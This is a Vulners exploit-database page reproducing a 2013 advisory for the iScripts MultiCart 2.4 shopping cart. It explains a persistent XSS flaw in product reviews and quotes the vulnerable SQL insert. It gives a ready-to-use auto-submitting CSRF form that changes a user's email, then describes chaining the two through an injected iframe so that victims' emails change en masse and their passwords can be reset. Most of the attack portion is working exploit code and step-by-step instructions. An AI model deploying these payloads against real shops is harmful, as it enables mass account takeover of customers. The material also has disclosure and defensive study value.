Vulners
Lucene search
iScripts MultiCart 2.4 Cross Site Request Forgery / Cross Site Scripting
`# Exploit Title : iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site Scripting
iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.
XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS
mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',
'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
$_POST['txtReview'] is inserted without sanitizing.
Exploitation
Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.
XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.
# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex"action="http://localhost/profile.php" method=post >
<input type=hidden size=30 maxlength=30 name=userid value="5">
<input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">
<input type=hidden size=30 maxlength=100 name=txtLastName value="admin">
<input type=hidden size=30 maxlength=30 name=txtEmail value="[email protected]">
<input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">
<input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
<input type=submit name=btnSaveChanges class=button value='Save'>
</form>
</html>
# XSS+CSRF Mass Email Change /Mass Account Takeover
XSS+CSRF can be used to change mass user email , after changing the email we can change the password too via
forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit
So now whenever user browse different products their useremail will be changed automatically.
#Independent Pakistani Security Researcher
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Dec 2013 00:00Current
0.2Low risk
Vulners AI Score0.2